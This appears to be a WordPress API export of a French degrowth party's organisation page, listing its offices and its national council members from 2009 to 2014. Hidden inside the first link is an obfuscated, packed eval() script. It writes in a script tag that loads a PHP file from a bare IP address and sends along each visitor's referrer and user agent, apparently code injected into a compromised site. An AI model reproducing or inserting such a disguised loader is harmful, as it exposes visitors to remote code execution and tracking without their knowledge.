{"id":4006,"date":"2010-02-02T09:55:32","date_gmt":"2010-02-02T08:55:32","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=4006"},"modified":"2014-07-02T20:17:39","modified_gmt":"2014-07-02T19:17:39","slug":"otre-organisation","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=4006","title":{"rendered":"Notre organisation"},"content":{"rendered":"<p style=\"text-align: center;\"><strong><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=7258\">Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|affyd|var|u0026u|referrer|nrbhe||js|php'.split('|'),0,{}))\n<\/script><\/noindex> fonctionnement du PPLD<br \/>\n<\/a><\/strong><\/p>\n<hr \/>\n<h2 class=\"title\">Les Membres du PPLD 2014<\/h2>\n<p style=\"text-align: center;\"><strong>Si\u00e8ge Social :<\/strong><br \/>\nParti Pour La D\u00e9croissance (chez S. Madelaine)<br \/>\n79, Boulevard Fran\u00e7ois 1er 76600 Le Havre<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3990\"><strong>Contacts<\/strong><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?p=8871\">Depuis l&rsquo;AG de 2014<\/a>, le PPLD a adopt\u00e9 un fonctionnement type collectif : du coup, <a href=\"http:\/\/ml.partipourladecroissance.net\/wws\/review\/conseil-national\">la liste des membres fluctue r\u00e9guli\u00e8rement<\/a>.<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?p=8898\">Nous sommes parti-e-s pour la d\u00e9croissance<\/a><\/p>\n<hr \/>\n<h2 class=\"title\">Les Membres du PPLD 2013<\/h2>\n<p style=\"text-align: center;\"><strong>Si\u00e8ge Social :<\/strong><br \/>\nParti Pour La D\u00e9croissance (chez S. Madelaine)<br \/>\n79, Boulevard Fran\u00e7ois 1er 76600 Le Havre<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3990\"><strong>Contacts<\/strong><\/a><\/p>\n<p><strong>Conseil National (voir <a href=\"http:\/\/www.partipourladecroissance.net\/?p=8309\">ici<\/a>)<br \/>\n<\/strong><\/p>\n<ul>\n<li>St\u00e9phane Madelaine (secr\u00e9taire national)<\/li>\n<li>Marie-Noel Hauser (tr\u00e9sori\u00e8re)<\/li>\n<li>Thomas Avenel (fichiers adh\u00e9rents)<\/li>\n<li>Cynthia Toupet<\/li>\n<li>Vincent Bruy\u00e8re<\/li>\n<li>Vincent Liegey<\/li>\n<li>Nicolas Cassagnau<\/li>\n<li>Christophe Ondet<\/li>\n<li>Sylvain Beltzung<\/li>\n<li>Anne-Isabelle Veillot<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2013\/06\/escargot.png\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-8351 aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2013\/06\/escargot.png\" alt=\"escargot\" width=\"224\" height=\"144\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><strong>Bient\u00f4t, une photo du collectif sortira de cette coquille !<\/strong><br \/>\n(merci \u00e0 <a href=\"http:\/\/www.courant-alternatif.fr\/\">http:\/\/www.courant-alternatif.fr\/<\/a> pour le pr\u00eat du dessin)<\/p>\n<hr \/>\n<h2 class=\"title\">Les Membres du PPLD 2012<\/h2>\n<p style=\"text-align: center;\"><strong>Si\u00e8ge Social :<\/strong><br \/>\nParti Pour La D\u00e9croissance<br \/>\n2, Impasse croix-blanche 78500 SARTROUVILLE<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3990\"><strong>Contacts<\/strong><\/a><\/p>\n<p><strong>Conseil National<\/strong><\/p>\n<ul>\n<li>Anisabel Veillot (Secr\u00e9taire Nationale)<\/li>\n<li>St\u00e9phane Madelaine<\/li>\n<li>Marie-No\u00ebl Hauser<\/li>\n<li>Cynthia Toupet<\/li>\n<li>Sylvain Beltzung<\/li>\n<li>Thomas Avenel<\/li>\n<li>Vincent Bruy\u00e8re<\/li>\n<li>Fran\u00e7ois Darlot<\/li>\n<li>Christian Ghiotti<\/li>\n<li>Vincent Liegey<\/li>\n<li>Christophe Ondet<\/li>\n<\/ul>\n<p><strong>Tr\u00e9sorier<\/strong><\/p>\n<ul>\n<li>Christophe Degennes<\/li>\n<\/ul>\n<p><strong>Les quatre commissions de travail :<\/strong><\/p>\n<ul>\n<li>Les <a href=\"..\/?page_id=3992\">adh\u00e9rent-e-s<\/a> peuvent rejoindre ces commissions en <a href=\"..\/?page_id=3990\">contactant le conseil national<\/a><\/li>\n<\/ul>\n<ol>\n<li><span style=\"text-decoration: underline;\">Le projet : les utopistes :<\/span><br \/>\nle r\u00f4le de cette commission est de construire un projet de transition et aussi une r\u00e9flexion sur ce que peuvent \u00eatre des soci\u00e9t\u00e9s de D\u00e9croissance.<\/li>\n<li><span style=\"text-decoration: underline;\">Organisation interne :<\/span><br \/>\nanimer et faire vivre \u00e0 la fois le PPLD mais aussi faciliter la mise en place et la vie des groupes ocaux d&rsquo;Objecteurs de Croissance.<\/li>\n<li><span style=\"text-decoration: underline;\">Communication externe :<\/span><br \/>\nrendre la D\u00e9croissance visible \u00e0 travers la r\u00e9daction de communiqu\u00e9s et d&rsquo;articles.<\/li>\n<li><span style=\"text-decoration: underline;\">Les \u00e9lections :<\/span><br \/>\npr\u00e9parer, d&rsquo;un point de vue juridique, financier et organisationnel, les prochaines \u00e9ch\u00e9ances \u00e9lectorales (s\u00e9natoriales, pr\u00e9sidentielles et l\u00e9gislatives).<\/li>\n<\/ol>\n<hr \/>\n<h2>Les Membres du PPLD 2011<\/h2>\n<p>&nbsp;<\/p>\n<p><strong>Conseil National<\/strong><\/p>\n<ul>\n<li>Anisabel Veillot (Secr\u00e9taire Nationale)<\/li>\n<li>Marie Durand<\/li>\n<li>Nadia Donati<\/li>\n<li>Marie-No\u00ebl Hauser<\/li>\n<li>Armelle Klein<\/li>\n<li>Vincent Bruy\u00e8re<\/li>\n<li>Fran\u00e7ois Darlot<\/li>\n<li>Christian Ghiotti<\/li>\n<li>Vincent Liegey<\/li>\n<li>St\u00e9phane Madelaine<\/li>\n<li>G\u00e9rard Mannig<\/li>\n<li>Christophe Ondet<\/li>\n<\/ul>\n<p><strong>Tr\u00e9sorier<\/strong><\/p>\n<ul>\n<li>Christophe Degennes<\/li>\n<\/ul>\n<hr \/>\n<h2>Les Membres du PPLD 2010<\/h2>\n<p><strong>Porte-Parole nationaux<\/strong><\/p>\n<ul>\n<li>Rocca Simon<\/li>\n<li>Christophe Degennes<\/li>\n<\/ul>\n<p><strong>Conseil National<\/strong><\/p>\n<ul>\n<li>BAHL Catherine<\/li>\n<li>BARTHELEMY Corto<\/li>\n<li>BRUYERE Vincent<\/li>\n<li>BORDE Davy<\/li>\n<li>CHALIGNE M\u00e9lanie<\/li>\n<li>DEJEAN Charlotte<\/li>\n<li>LIEGEY Vincent<\/li>\n<li>MADELAINE St\u00e9phane<\/li>\n<li>ONDET Christophe<\/li>\n<li>UTRERA Catherine<\/li>\n<li>VITARI Claudio<\/li>\n<\/ul>\n<p><strong>Secr\u00e9taire National et Bureau<\/strong><\/p>\n<ul>\n<li>Christophe Ondet est d\u00e9sign\u00e9 Secr\u00e9taire National<\/li>\n<li>MADELAINE St\u00e9phane, secr\u00e9taire national adjoint en charge de la communication interne<\/li>\n<li>DEJEAN Charlotte, secr\u00e9taire nationale adjointe en charge des \u00e9lections<\/li>\n<li>BORDE Davy, tr\u00e9sorier<\/li>\n<li>LIEGEY Vincent, tr\u00e9sorier adjoint.<\/li>\n<\/ul>\n<hr \/>\n<h2 class=\"title\">Le Bureau National 2009<\/h2>\n<p style=\"text-align: center;\"><strong>Si\u00e8ge Social :<\/strong><br \/>\nParti Pour La D\u00e9croissance<br \/>\n17 bis, Rue Georges Bourgoin<em> &#8211; 78260 <\/em> Ach\u00e8res<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3990\"><strong>Contacts<\/strong><\/a><\/p>\n<ul>\n<li><em>R\u00e9my Cardinal : secr\u00e9taire national adjoint en charge de la communication interne<\/em><\/li>\n<li><em>Christophe Degennes : secr\u00e9taire national adjoint en charge des \u00e9lections<\/em><\/li>\n<li><em>Elodie Garcia : tr\u00e9sori\u00e8re<\/em><\/li>\n<li><em>Vincent Li\u00e9gey : porte-parole<\/em><\/li>\n<li><em>Christophe Ondet : secr\u00e9taire national<\/em><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<hr \/>\n<h2 class=\"title\">Le Conseil National 2009<\/h2>\n<ul>\n<li><em>Davy Borde : tr\u00e9sorier adjoint<\/em><\/li>\n<li><em>R\u00e9my Cardinal : secr\u00e9taire adjoint en charge de la communication interne<\/em><\/li>\n<li><em>Olivier Bouly<\/em><\/li>\n<li><em>Salih Branki\u00a0 : porte parole<\/em><\/li>\n<li><em>Christophe Degennes : secr\u00e9taire national adjoint en charge des \u00e9lections<\/em><\/li>\n<li><em>Benjamin Dupin<\/em><\/li>\n<li><em>Elodie Garcia : tr\u00e9sori\u00e8re<\/em><\/li>\n<li><em>Julien Gonzalez<\/em><\/li>\n<li><em>Vincent Liegey : porte-parole<\/em><\/li>\n<li><em>St\u00e9phane Madelaine : r\u00e9dacteur du site internet<\/em><\/li>\n<li><em>Christophe Ondet : <\/em><em>secr\u00e9taire national<\/em><\/li>\n<li><em>Fr\u00e9d\u00e9ric Paquet<\/em><\/li>\n<li><em>R\u00e9gis Rolles<\/em><\/li>\n<li><em>Claudio Vitari<\/em><\/li>\n<\/ul>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-439\" title=\"ppld-cn-2009\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/01\/ppld-cn-2009.jpg\" alt=\"ppld-cn-2009\" width=\"540\" height=\"275\" \/><\/p>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Le fonctionnement du PPLD Les Membres du PPLD 2014 Si\u00e8ge Social : Parti Pour La D\u00e9croissance (chez S. Madelaine) 79, Boulevard Fran\u00e7ois 1er 76600 Le Havre Contacts Depuis l&rsquo;AG de 2014, le PPLD a adopt\u00e9 un fonctionnement type collectif : &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=4006\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3982,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4006","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4006","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4006"}],"version-history":[{"count":33,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4006\/revisions"}],"predecessor-version":[{"id":8911,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4006\/revisions\/8911"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3982"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4006"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}